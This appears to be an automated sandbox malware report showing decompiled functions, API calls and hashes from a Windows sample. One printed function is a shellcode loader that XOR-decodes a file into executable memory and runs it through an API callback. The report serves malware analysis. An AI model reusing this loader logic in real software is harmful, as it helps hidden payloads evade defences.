                                                        						}  // 0x013b74c7
                                                        						E013B1741(_t6, _t31);  // 0x013b74b4
                                                        						 *((intOrPtr*)(E013B1CC3())) = 0xc;  // 0x013b74bf
                                                        						goto L12;  // 0x00000000
                                                        					} else {  // 0x013b746e
                                                        						E013B4831(_a4);  // 0x013b7471
                                                        						_t8 = 0;  // 0x013b7477
                                                        					}  // 0x013b7477
                                                        					L14:  // 0x013b74c8
                                                        					return _t8;  // 0x013b74ca
                                                        				} else {  // 0x013b745b
                                                        					return E013B1147(__ebx, __edx, __edi, _a8);  // 0x013b7465
                                                        				}  // 0x013b7465
                                                        			}

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B745E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                        • _free.LIBCMT ref: 013B7471
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 2734353464-0
                                                        • Opcode ID: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction ID: 859dcdae0e9d528b2c7f2f5ac264ad57fc5d2a7282168220c136b21e0d057271
                                                        • Opcode Fuzzy Hash: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction Fuzzy Hash: C2119431805616AACB313E7CB8D46D93F98EB50369F104525EB49AAEC0FA788940C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E013B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
                                                        				intOrPtr _v8;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				intOrPtr _t6;
                                                        				void* _t7;
                                                        				void* _t18;
                                                        				_Unknown_base(*)()* _t19;
                                                        				void* _t24;
                                                        				void* _t25;
                                                        				void* _t26;
                                                        				intOrPtr* _t32;
                                                        
                                                        				_push(_t18);
                                                        				_t26 = 0;
                                                        				_t6 = E013B1147(_t18, _t24, 0, 0x17d78400);
                                                        				 *_t32 = 0x13c3000;
                                                        				_v8 = _t6;
                                                        				_t7 = E013B11D9(_a12, _t25);
                                                        				_t19 = VirtualAlloc(0, 0x1487, 0x3000, 0x40);
                                                        				E013B147D(_t19, 0x1487, 1, _t7);
                                                        				_t10 = _v8;
                                                        				if(_v8 != 0) {
                                                        					E013B1530(_t10, 0xcb, 0x17d78400);
                                                        					do {
                                                        						 *((char*)(_t19 + _t26)) = ( *((intOrPtr*)(_t19 + _t26)) + 0x00000001 ^ 0x000000dd) - 0x3b;
                                                        						_t26 = _t26 + 1;
                                                        					} while (_t26 < 0x1487);
                                                        					EnumSystemCodePagesW(_t19, 0);
                                                        				}
                                                        				return 0;
                                                        			}

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B100E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                          • Part of subcall function 013B11D9: __wfsopen.LIBCMT ref: 013B11E4
                                                        • VirtualAlloc.KERNEL32(00000000,00001487,00003000,00000040), ref: 013B1036
                                                        • __fread_nolock.LIBCMT ref: 013B1048
                                                        • _memset.LIBCMT ref: 013B1062
                                                        • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 013B107E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                                        • String ID:
                                                        • API String ID: 612201108-0
                                                        • Opcode ID: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction ID: d33b299ec09634e5aaa5e3fabe5523ab3d0286d94cd664b55446cccf0118649c
                                                        • Opcode Fuzzy Hash: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction Fuzzy Hash: 370126726043447BF7212A7AAC9BFDF3F5CDB51B5CF100865FB02AA581F9A498019274
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 45%
                                                        			E008853A5(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t32;
                                                        				signed int _t37;
                                                        				signed int _t40;
                                                        				signed int _t42;
                                                        				void* _t45;
                                                        				intOrPtr _t46;
                                                        				void* _t48;
                                                        				signed int _t49;
                                                        				void* _t51;
                                                        				signed int _t57;
                                                        				signed int _t64;
                                                        				signed int _t71;
                                                        				void* _t74;
                                                        				intOrPtr _t78;
                                                        				signed int* _t79;
                                                        				void* _t85;
                                                        				signed int _t86;
                                                        				signed int _t92;
                                                        				void* _t104;
                                                        				void* _t105;
                                                        
                                                        				_t64 = _a4;
                                                        				_t32 =  *(_t64 + 0x28);
                                                        				_t71 = _t64 + 0x28;
                                                        				_push(_t92);
                                                        				if(_t32 < 0) {
                                                        					_t78 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                        						goto L3;
                                                        					} else {
                                                        						__eflags = _t32 | 0xffffffff;
                                                        						asm("lock xadd [ecx], eax");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L3:
                                                        					_push(_t86);
                                                        					while(1) {
                                                        						L4:
                                                        						__eflags = _t32;
                                                        						if(_t32 == 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                        							_t79 = _t64 + 0x24;
                                                        							_t71 = 1;
                                                        							asm("lock xadd [eax], ecx");
                                                        							_t32 =  *(_t64 + 0x28);
                                                        							_a4 = _t32;
                                                        							__eflags = _t32;
                                                        							if(_t32 != 0) {
                                                        								L19:
                                                        								_t86 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009401c0;
                                                        									_push(_t92);
                                                        									_push(0);
                                                        									_t37 = L0085F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                        									__eflags = _t37 - 0x102;
                                                        									if(_t37 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t71 =  *(_t92 + 4);
                                                        									_t85 =  *_t92;
                                                        									_t51 = L008A4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                        									_push(_t85);
                                                        									_push(_t51);
                                                        									L008B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                        									L008B3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                        									_t86 = _t86 + 1;
                                                        									_t105 = _t104 + 0x28;
                                                        									__eflags = _t86 - 2;
                                                        									if(__eflags > 0) {
                                                        										E008E217A(_t71, __eflags, _t64);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									L008B3F92();
                                                        									_t104 = _t105 + 0xc;
                                                        								}
                                                        								__eflags = _t37;
                                                        								if(__eflags < 0) {
                                                        									_push(_t37);
                                                        									L008A3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                        									asm("int3");
                                                        									_t40 =  *_t71;
                                                        									 *_t71 = 0;
                                                        									__eflags = _t40;
                                                        									if(_t40 == 0) {
                                                        										L1:
                                                        										_t42 = E00885384(_t92 + 0x24);
                                                        										if(_t42 != 0) {
                                                        											goto L31;
                                                        										} else {
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                        										_push( &_a4);
                                                        										_push(_t40);
                                                        										_t49 = L0085F970( *((intOrPtr*)(_t92 + 0x18)));
                                                        										__eflags = _t49;
                                                        										if(__eflags >= 0) {
                                                        											goto L1;
                                                        										} else {
                                                        											_push(_t49);
                                                        											L008A3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                        											L31:
                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                        											_push( &_a4);
                                                        											_push(1);
                                                        											_t42 = L0085F970( *((intOrPtr*)(_t92 + 0x20)));
                                                        											__eflags = _t42;
                                                        											if(__eflags >= 0) {
                                                        												L2:
                                                        												return _t42;
                                                        											} else {
                                                        												_push(_t42);
                                                        												L008A3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                        												_push( &_a4);
                                                        												_push(1);
                                                        												_t42 = L0085F970( *((intOrPtr*)(_t92 + 0x20)));
                                                        												__eflags = _t42;
                                                        												if(__eflags >= 0) {
                                                        													goto L2;
                                                        												} else {
                                                        													_push(_t42);
                                                        													_t45 = L008A3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                        													asm("int3");
                                                        													while(1) {
                                                        														_t74 = _t45;
                                                        														__eflags = _t45 - 1;
                                                        														if(_t45 != 1) {
                                                        															break;
                                                        														}
                                                        														_t86 = _t86 | 0xffffffff;
                                                        														_t45 = _t74;
                                                        														asm("lock cmpxchg [ebx], edi");
                                                        														__eflags = _t45 - _t74;
                                                        														if(_t45 != _t74) {
                                                        															continue;
                                                        														} else {
                                                        															_t46 =  *[fs:0x18];
                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                        															return _t46;
                                                        														}
                                                        														goto L38;
                                                        													}
                                                        													E00885329(_t74, _t92);
                                                        													_push(1);
                                                        													_t48 = E008853A5(_t92);
                                                        													return _t48;
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								} else {
                                                        									_t32 =  *(_t64 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t71 =  *_t79;
                                                        								__eflags = _t71;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t57 = _t71;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t57 - _t71;
                                                        										if(_t57 == _t71) {
                                                        											break;
                                                        										}
                                                        										_t71 = _t57;
                                                        										__eflags = _t57;
                                                        										if(_t57 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									_t32 = _a4;
                                                        									__eflags = _t71;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L19;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L38;
                                                        					}
                                                        					_t71 = _t71 | 0xffffffff;
                                                        					_t32 = 0;
                                                        					asm("lock cmpxchg [edx], ecx");
                                                        					__eflags = 0;
                                                        					if(0 != 0) {
                                                        						goto L4;
                                                        					} else {
                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L38:
                                                        			}
                                                        0x00885378
                                                        0x0088537c
                                                        0x008c2396
                                                        0x008c2396
                                                        0x008c2397
                                                        0x008c239c
                                                        0x008c23a2
                                                        0x008c23a3
                                                        0x008c23a6
                                                        0x008c23ab
                                                        0x008c23ad
                                                        0x00000000
                                                        0x008c23b3
                                                        0x008c23b3
                                                        0x008c23b4
                                                        0x008c23b9
                                                        0x008c23ba
                                                        0x008c23ba
                                                        0x008c23bc
                                                        0x008c23bf
                                                        0x00000000
                                                        0x00000000
                                                        0x008b9153
                                                        0x008b9158
                                                        0x008b915a
                                                        0x008b915e
                                                        0x008b9160
                                                        0x00000000
                                                        0x008b9166
                                                        0x008b9166
                                                        0x008b9171
                                                        0x008b9176
                                                        0x008b9176
                                                        0x00000000
                                                        0x008b9160
                                                        0x008c23c6
                                                        0x008c23cb
                                                        0x008c23ce
                                                        0x008c23d7
                                                        0x008c23d7
                                                        0x008c23ad
                                                        0x008c2390
                                                        0x008c2373
                                                        0x008c233f
                                                        0x008c233f
                                                        0x00000000
                                                        0x008c233f
                                                        0x008c2291
                                                        0x008c2291
                                                        0x008c2293
                                                        0x008c2295
                                                        0x008c229a
                                                        0x008c22a1
                                                        0x008c22a3
                                                        0x008c22a7
                                                        0x008c22a9
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22ab
                                                        0x008c22ad
                                                        0x008c22af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22af
                                                        0x008c22b1
                                                        0x008c22b4
                                                        0x008c22b4
                                                        0x008c22b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22b6
                                                        0x008c228f
                                                        0x00000000
                                                        0x008c226d
                                                        0x008853cb
                                                        0x008853ce
                                                        0x008853d0
                                                        0x008853d4
                                                        0x008853d6
                                                        0x00000000
                                                        0x008853d8
                                                        0x008853e3
                                                        0x008853ea
                                                        0x008853ea
                                                        0x008853d6
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C22F4
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008C22FC
                                                        • RTL: Re-Waiting, xrefs: 008C2328
                                                        • RTL: Resource at %p, xrefs: 008C230B
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: fff28840f930ac96fe059a34a162b8967f99c6b9fd7e3595de57cbaeb8efa4a6
                                                        • Instruction ID: 728101a97bab29702f6e86f7d53fdb4a5a0b55dd0cdf341c2381c0d06fc7e549
                                                        • Opcode Fuzzy Hash: fff28840f930ac96fe059a34a162b8967f99c6b9fd7e3595de57cbaeb8efa4a6
                                                        • Instruction Fuzzy Hash: 085114716007016BEB11AB2CCC81FAA73A8FF56364F104229FD09DB381EA75ED4187A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E013B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v20;
                                                        				signed int _t35;
                                                        				int _t38;
                                                        				signed int _t41;
                                                        				int _t42;
                                                        				intOrPtr* _t44;
                                                        				int _t47;
                                                        				short* _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr _t54;
                                                        				int _t55;
                                                        				signed int _t59;
                                                        				char* _t62;
                                                        
                                                        				_t62 = _a8;
                                                        				if(_t62 == 0) {
                                                        					L5:
                                                        					return 0;
                                                        				}
                                                        				_t50 = _a12;
                                                        				if(_t50 == 0) {
                                                        					goto L5;
                                                        				}
                                                        				if( *_t62 != 0) {
                                                        					E013B4BFC( &_v20, _a16);
                                                        					_t35 = _v20;
                                                        					__eflags =  *(_t35 + 0xa8);
                                                        					if( *(_t35 + 0xa8) != 0) {
                                                        						_t38 = E013B917B( *_t62 & 0x000000ff,  &_v20);
                                                        						__eflags = _t38;
                                                        						if(_t38 == 0) {
                                                        							__eflags = _a4;
                                                        							_t41 = _v20;
                                                        							_t59 = 1;
                                                        							_t28 = _t41 + 4; // 0x840ffff8
                                                        							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                        							__eflags = _t42;
                                                        							if(_t42 != 0) {
                                                        								L21:
                                                        								__eflags = _v8;
                                                        								if(_v8 != 0) {
                                                        									_t54 = _v12;
                                                        									_t31 = _t54 + 0x70;
                                                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                        									__eflags =  *_t31;
                                                        								}
                                                        								return _t59;
                                                        							}
                                                        							L20:
                                                        							_t44 = E013B1CC3();
                                                        							_t59 = _t59 | 0xffffffff;
                                                        							__eflags = _t59;
                                                        							 *_t44 = 0x2a;
                                                        							goto L21;
                                                        						}
                                                        						_t59 = _v20;
                                                        						__eflags =  *(_t59 + 0x74) - 1;
                                                        						if( *(_t59 + 0x74) <= 1) {
                                                        							L15:
                                                        							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                                        							__eflags = _t50 -  *_t20;
                                                        							L16:
                                                        							if(__eflags < 0) {
                                                        								goto L20;
                                                        							}
                                                        							__eflags = _t62[1];
                                                        							if(_t62[1] == 0) {
                                                        								goto L20;
                                                        							}
                                                        							L18:
                                                        							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                                        							_t59 =  *_t22;
                                                        							goto L21;
                                                        						}
                                                        						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                                        						__eflags = _t50 -  *_t12;
                                                        						if(__eflags < 0) {
                                                        							goto L16;
                                                        						}
                                                        						__eflags = _a4;
                                                        						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                                        						_t18 = _t59 + 4; // 0x840ffff8
                                                        						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                        						_t59 = _v20;
                                                        						__eflags = _t47;
                                                        						if(_t47 != 0) {
                                                        							goto L18;
                                                        						}
                                                        						goto L15;
                                                        					}
                                                        					_t55 = _a4;
                                                        					__eflags = _t55;
                                                        					if(_t55 != 0) {
                                                        						 *_t55 =  *_t62 & 0x000000ff;
                                                        					}
                                                        					_t59 = 1;
                                                        					goto L21;
                                                        				}
                                                        				_t49 = _a4;
                                                        				if(_t49 != 0) {
                                                        					 *_t49 = 0;
                                                        				}
                                                        				goto L5;
                                                        			}

                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 013B91FC
                                                        • __isleadbyte_l.LIBCMT ref: 013B922A
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 013B9258
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 013B928E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction ID: d86a7a1f11582a673608fc84ac8bb432bb18804f92e15a5ae5a2cb95dde52d73
                                                        • Opcode Fuzzy Hash: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction Fuzzy Hash: 9C31C271A0024EAFEB218E69CC84BEA7FA9BF4131CF154128E7158B990F731D850DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E013BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                        				intOrPtr _t25;
                                                        				void* _t26;
                                                        
                                                        				_t25 = _a16;
                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                        					_t26 = E013BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                        					goto L9;
                                                        				} else {
                                                        					_t34 = _t25 - 0x66;
                                                        					if(_t25 != 0x66) {
                                                        						__eflags = _t25 - 0x61;
                                                        						if(_t25 == 0x61) {
                                                        							L7:
                                                        							_t26 = E013BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                                                        						} else {
                                                        							__eflags = _t25 - 0x41;
                                                        							if(__eflags == 0) {
                                                        								goto L7;
                                                        							} else {
                                                        								_t26 = E013BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                        							}
                                                        						}
                                                        						L9:
                                                        						return _t26;
                                                        					} else {
                                                        						return E013BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                        					}
                                                        				}
                                                        			}

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: d722a6699da6baaa2af529011bcd170f5a409b5f950ebcbb33fffb9adf9c83e0
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 72014C7604464EFBCF125F88CC818EE3F66BB19258B4A8515FF195A830E736C5B1BB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:2.4%
                                                        Dynamic/Decrypted Code Coverage:1.7%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:706
                                                        Total number of Limit Nodes:80

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 619 12a28a-12a28f 620 12a291-12a2a6 619->620 621 12a2e6-12a321 call 12af20 NtCreateFile 619->621 623 12a2ac-12a2c9 620->623 624 12a2a7 call 12af20 620->624 624->623
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,001257A7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,001257A7,00000000,00000005,00000060,00000000,00000000), ref: 0012A31D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 0e6f602c42f14cc5e16e1ed26be39846bed8539e117ae552000b1057516d79ba
                                                        • Instruction ID: 928d8cd593df555682a67eb3d14201e18740c3b6feef237e91f79440cb9d0db3
                                                        • Opcode Fuzzy Hash: 0e6f602c42f14cc5e16e1ed26be39846bed8539e117ae552000b1057516d79ba
                                                        • Instruction Fuzzy Hash: 1811CEB2204108ABCB18DF88ED85DEB77ADEF8C754F108608FA0D97245D630E861CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 651 12a2ca-12a321 call 12af20 NtCreateFile
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,001257A7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,001257A7,00000000,00000005,00000060,00000000,00000000), ref: 0012A31D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 34416b3c67aabb50b3260deba280d7f321ba982010436e84802275f453fc1dae
                                                        • Instruction ID: 5c4005991c0dfc2f99eb6ab37daa5bbae489e7e97368593a1ad532225aafe005
                                                        • Opcode Fuzzy Hash: 34416b3c67aabb50b3260deba280d7f321ba982010436e84802275f453fc1dae
                                                        • Instruction Fuzzy Hash: A701A4B2200108AFCB48CF98DC85DEB37A9AF8C354F118259FA0DD7255D630E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,001257A7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,001257A7,00000000,00000005,00000060,00000000,00000000), ref: 0012A31D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                        • Instruction ID: 05c6136831665a7db2c1c06687f6694819d4ab34231229cfebf32cde63c2942a
                                                        • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                        • Instruction Fuzzy Hash: 79F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118248BA0997245D630F8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtReadFile.NTDLL(00125962,5DB515AF,FFFFFFFF,00125621,00000206,?,00125962,00000206,00125621,FFFFFFFF,5DB515AF,00125962,00000206,00000000), ref: 0012A3C5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
